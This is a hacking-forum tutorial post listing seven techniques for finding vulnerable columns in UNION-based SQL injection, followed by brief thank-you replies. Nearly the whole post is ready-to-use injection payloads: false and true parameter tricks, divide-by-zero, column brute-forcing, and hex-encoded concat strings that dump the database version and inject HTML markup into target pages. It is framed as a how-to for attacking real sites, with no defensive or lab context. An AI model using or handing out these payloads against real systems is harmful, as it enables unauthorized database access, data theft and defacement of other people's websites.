MaDLeeTs • Cyber Security & Professional Webmasters Forum

Full Version: Find Vulnerable Column New
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
How to find Vulnerable Columns?  25 25 25
1st Technique:-
use -> id = -1 union select 1,2,3,4,5--
use -> id = 1111/9999/null/bybysql union select 1,2,3,4,5--
use -> id = .1/1.2/12.4 union select 1,2,3,4,5--   [Thanks to Crown sir]

Note:- I use null  and bybysql.  Not confuse with them u can use watever u like means use dat things which doesn't exist [Thanks to Hack Forum]

2nd Technique :- False Parameter
Here False Parameter means   put something that make a wrong response into our SQL PARAMETER  like
(a) 1=2, 1=0
use -> id=1 or 1=2 union select 1,2,3,4,5--
use -> id=1 or 1=0 union select 1,2,3,4,5--

(b) Also can we use having, like, <>
use -> id=1 having/HAVING 1=2 union select 1,2,3,4,5--
use -> id=1  1  like/LIKE 2 union select 1,2,3,4,5--
use -> id=1   1 <> 1 union select 1,2,3,4,5--
use -> id=1 {having/and} 1 like 2  union select 1,2,3,4,5--
use -> id=1 {having/and} 1 <> 1 union select 1,2,3,4,5--     /* use either  having or and

© Also u can use  and false/AND FALSE statement
use ->  id=1  and false union select 1,2,3,4,5--

3rd Technique :-  Divide by 0  means  -> /0    and  +div+0    
use -> id =12/0 union select 1,2,3,4,5--

use -> id = 12+div+0+ union select 1,2,3,4,5--

4th Technique :- Look closely, or scratch the HTML source code

The number can potentially be display anywhere, when it's kind of rough, just change the query to make the whole thing more visible to something like union select 1111,2222,3333,4444,5555--

Above we use 1111 ,2222  instead of 1,2 respectively

After writing dat code  open source code then search  the 'Column Number' like 1111,2222,3333,4444,5555  by using  (CTRL+F :- For finding something in source code) Then check where is dat number appearing in source code

Sometimes the number display on the page title.

When U get the vulnerable columns then u want to  display the version,user,database or some html parts to visible on page  So 4 dat Follow These Steps :-
i.) id = -1 union select 1111,2222,concat(0x223e,@@version,0x3c696d67207372633d22),4444--
223e =>    ">
3c696d67207372633d22   =>       <img src="  
*Remeber we use 0x so dat above hex code works

ii.) 4 print our name
id = -1 union select 1111,2222,concat(0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d),4444--
0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d =>   \"><font color = red size=4>AAKASH</font><!--

5th Technique :-
U tried all above technique but stille can't get vulnerable column  then u can also use this 5th technique.... Wats new in this technique    See :-

u can use union select 1,2,3,4,5--   as  union (select 1,2,3,4,5)--
use :- id=-2 union (select 1,2,3,4,5)--     
/*  If u see vul col  like 3 then
use :- id=-2 union (select 1,2,333(4 check)/@@version,4,5)--   

6th Technique :- True Parameter

use -> id=1 +where+1=1  union select 1,2,3,4,5--
use -> id=1 +and+50=50  union select 1,2,3,4,5--
use -> id=1 =75=75  union select 1,2,3,4,5--

7th Technique :- Bruteforcing the column /* Thanks to My Master Devilhunter Dante
Frnds when u can't find  number of columns  then u also can use this techniue. By this technique  not only u find number of columns u also get vulnerable columns.
Follow the following steps
1st do  ->  union select 1--
2nd do -> union select 1,2--
3rd do -> union select 1,2,3--
4th do -> union slect 1,2,3,4--
5th do -> union select 1,2,3,4,5--

Do above steps untill u cant get vulnerable columns Smiley1 

Thanks and credit goes to
2. MakMan
3.Benzi  music music
Thumbsupsmileyanim Thumbsupsmileyanim Thumbsupsmileyanim Thumbsupsmileyanim
Old Methods  90 ....
Old Method Any Good :angel:
nice and keep share bro Smiley1
Good share..
old but gold
Thanks for sharing bro :p
Thanks for sharing.
OLD is Always GOLD Smiley1